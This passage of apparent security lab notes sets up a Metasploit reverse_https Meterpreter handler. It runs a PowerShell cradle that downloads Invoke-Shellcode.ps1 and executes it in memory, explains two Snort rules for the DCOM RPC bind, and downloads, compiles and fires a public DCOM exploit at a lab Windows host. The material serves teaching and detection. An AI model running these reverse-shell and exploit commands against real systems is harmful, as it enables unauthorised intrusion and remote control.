cd ~/toolz/metasploit/

# The lines after msfconsole are typed at the msf prompt: multi/handler with
# windows/meterpreter/reverse_https listening on 192.168.150.129:4443.
# ExitOnSession false keeps the handler up after the first session arrives,
# EXITFUNC thread selects the payload's exit technique, and exploit -j runs the
# handler as a background job so the console stays usable.
sudo ./msfconsole
use exploit/multi/handler
set ExitOnSession false
set payload windows/meterpreter/reverse_https
set LHOST 192.168.150.129
set LPORT 4443
set EXITFUNC thread
exploit -j
5218
5219
5220
REM Downloads Invoke-Shellcode.ps1 over HTTPS and runs it in memory (IEX of the
REM script text, nothing written to disk), then calls Invoke-Shellcode with the
REM same payload, LHOST and LPORT as the handler configured above; the three
REM values must match or the session never arrives.
REM Defender note: both the download cradle and the fetched script body are
REM recorded by PowerShell Script Block Logging (event 4104) where it is enabled.
powershell -command "IEX (New-Object Net.WebClient).DownloadString('https://s3.amazonaws.com/infosecaddictsfiles/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.150.129 -Lport 4443 -Force"
5222
5223
5224
5225
5226
5227
5228
5229#############################
5230# Understanding Snort rules #
5231#############################
5232Field 1: Action - Snort can process events in 1 of 3 ways (alert, log, drop)
5233
5234Field 2: Protocol - Snort understands a few types of traffic (tcp, udp, icmp)
5235
5236Field 3: Source IP (can be a variable like $External_Net, or an IP, or a range)
5237
5238Field 4: Source Port (can be a variable like $WebServer_Ports, or a port number, or a range of ports)
5239
5240Field 5: Traffic Direction (->)
5241
5242Field 6: Destination IP (can be a variable like $External_Net, or an IP, or a range)
5243
5244Field 7: Destination Port (can be a variable like $WebServer_Ports, or a port number, or a range of ports)
5245
5246Field 8: MSG - what is actually displayed on the analyst's machine
5247
5248
5249Let's look at 2 simple rules
5250----------------------------------------------------------------------------------
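# Both rules use the eight fields described above. The msg/content values must
# be wrapped in straight ASCII double quotes; the curly quotes in the original
# paste would not parse as intended in Snort. A trailing "\" continues the rule
# on the next line.
# Rule 1: DCERPC ISystemActivator bind sent directly to the RPC endpoint
# mapper port (135).
alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"NETBIOS DCERPC ISystemActivator \
bind attempt"; flow:to_server,established; content:"|05|"; distance:0; within:1; \
content:"|0b|"; distance:1; within:1; byte_test:1,&,1,0,relative; content:"|A0 01 00 \
00 00 00 00 00 C0 00 00 00 00 00 00 46|"; distance:29; within:16; \
reference:cve,CAN-2003-0352; classtype:attempted-admin; sid:2192; rev:1;)

# Rule 2: the same bind carried over SMB (port 445); the leading content
# matches first locate the SMB header and the UTF-16 "\PIPE\" string before the
# DCERPC checks shared with rule 1.
alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"NETBIOS SMB DCERPC ISystemActivator bind \
attempt"; flow:to_server,established; content:"|FF|SMB|25|"; nocase; offset:4; \
depth:5; content:"|26 00|"; distance:56; within:2; content:"|5c \
00|P|00|I|00|P|00|E|00 5c 00|"; nocase; distance:5; within:12; content:"|05|"; \
distance:0; within:1; content:"|0b|"; distance:1; within:1; \
byte_test:1,&,1,0,relative; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 \
46|"; distance:29; within:16; reference:cve,CAN-2003-0352; classtype:attempted-admin; \
sid:2193; rev:1;)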
5265----------------------------------------------------------------------------------
5266
5267
5268
5269From your Linux machine ping your Windows machine
5270ping 192.168.150.1
5271
5272
5273
5274Start Wireshark and create some simple filters:
5275
5276Filter 1:
5277ip.addr==192.168.150.1
5278
5279
5280Filter 2:
5281ip.addr==192.168.150.1 && icmp
5282
5283
5284
5285Filter 3:
5286ip.addr==192.168.150.1 && !(tcp.port==22)
5287
5288Now stop your capture and restart it (make sure you keep the filter)
5289
5290
5291
5292
5293Back to your Linux machine:
5294[ CTRL-C ] - to stop your ping
5295
# Fetch and build the sample program whose traffic the Wireshark capture
# restarted above is meant to show; presumably it produces the DCE-RPC bind
# that the two Snort rules above (sid 2192/2193, CAN-2003-0352) describe —
# confirm in the capture.
# NOTE(review): the source is fetched over plain HTTP with no checksum or
# signature; read it before compiling and running it.
wget http://downloads.securityfocus.com/vulnerabilities/exploits/oc192-dcom.c


gcc -o exploit oc192-dcom.c

# Run once with no arguments (presumably prints the usage), then against the
# Windows machine that was pinged earlier.
./exploit


./exploit -d 192.168.150.1 -t 0
5305
5306
5307
5308
5309Now go back to WireShark and stop the capture.